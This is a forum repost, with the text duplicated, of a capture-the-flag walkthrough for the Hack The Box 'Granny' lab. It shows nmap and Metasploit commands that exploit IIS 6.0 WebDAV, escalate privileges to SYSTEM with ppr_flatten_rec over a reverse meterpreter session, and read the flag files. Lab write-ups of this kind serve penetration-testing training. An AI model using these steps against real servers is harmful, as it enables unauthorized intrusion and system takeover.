mynewyorkjets
Cyber Defense Engineer
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Hello friends!! Today we are going to solve another CTF challenge “Granny” which is categories as retired lab presented by Hack the Box for making online penetration practices. Challenges in this lab are not hard to complete although they are like a brain teaser for the beginner as well as for expert penetration tester too.
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Granny is 10.10.10.15 so let’s initiate with nmap port enumeration.
From the given below image, you can observe we found port 80 is open and Microsoft IIS 6.0 is running in victim’s network.
Significant port 80 is open in the victim’s network we preferred to explore his IP in the browser and resulting web page is shown below.
Since we know Microsoft IIS httpd 6.0 is running in victims system therefore when I Google I found Rapid 7 exploit for this as highlighted in given below image.
Without wasting time I open a new terminal and type msfconsole for loading Metasploit framework and use module iis_webdav for exploiting targets system.
From given below image you can observe meterpreter shell session1 opened for accessing victim tty shell.
Every time my meterpreter session get died therefore I go post exploitation for migrating current process into another process by executing the following module.
Above module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.
Wonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with the last option as highlighted in the image.
At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.
Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.
As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.
Here we found Document and setting let’s explore
Inside C:\Document and Setting\Lakis\Desktop I found the user.txt file and used the type “filename” command for reading this file.
Great!! We got our 1st flag successfully
Inside C:\Document and Setting\Administrtator\Desktop I found the root.txt file and used the type “filename” command for reading this file.
Great!! We got our 2nd flag successfully
Breaching this lab was an interesting and enjoyable moment for me. It will take less time if you are aware of proper Metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.
Happy Hacking!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Level: Intermediate
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are online accessible therefore they have static IP. The IP of Granny is 10.10.10.15 so let’s initiate with nmap port enumeration.
Code:
nmap -A 10.10.10.15From the given below image, you can observe we found port 80 is open and Microsoft IIS 6.0 is running in victim’s network.
Significant port 80 is open in the victim’s network we preferred to explore his IP in the browser and resulting web page is shown below.
Since we know Microsoft IIS httpd 6.0 is running in victims system therefore when I Google I found Rapid 7 exploit for this as highlighted in given below image.
Without wasting time I open a new terminal and type msfconsole for loading Metasploit framework and use module iis_webdav for exploiting targets system.
Code:
use exploit/windows/iis/iis_webdav_upload_asp
msf exploit(windows/iis/iis_webdav_upload_asp) >set rhost 10.10.10.15
msf exploit(windows/iis/iis_webdav_upload_asp) >runFrom given below image you can observe meterpreter shell session1 opened for accessing victim tty shell.
Every time my meterpreter session get died therefore I go post exploitation for migrating current process into another process by executing the following module.
Code:
use post/windows/manage/migrate
msf post(windows/manage/migrate)>set session 1
msf post(windows/manage/migrate)> runAbove module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.
Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for the further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.
Code:
use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
msf post(multi/recon/local_exploit_suggester) > exploitWonderful!! Exploit Suggester truly proof itself by suggesting another exploit name to which target is vulnerable. So now we will go with the last option as highlighted in the image.
At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.
Code:
use exploit/windows/local/ppr_flatten_rec
msf exploit(windows/local/ppr_flatten_rec) >set session 1
msf exploit(windows/local/ppr_flatten_rec) >set wait 20
msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.6
msf exploit(windows/local/ppr_flatten_rec) > exploitNice!! It works and we got meterpreter session 2 as system user and you can check in below image.
Code:
meterpreter > getuidAs we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.
Code:
meterpreter > lsHere we found Document and setting let’s explore
Inside C:\Document and Setting\Lakis\Desktop I found the user.txt file and used the type “filename” command for reading this file.
Code:
cd Lakis/Desktop
cat user.txtGreat!! We got our 1st flag successfully
Inside C:\Document and Setting\Administrtator\Desktop I found the root.txt file and used the type “filename” command for reading this file.
Code:
cd Administrator/Desktop
cat root.txtGreat!! We got our 2nd flag successfully
Breaching this lab was an interesting and enjoyable moment for me. It will take less time if you are aware of proper Metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.
Happy Hacking!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here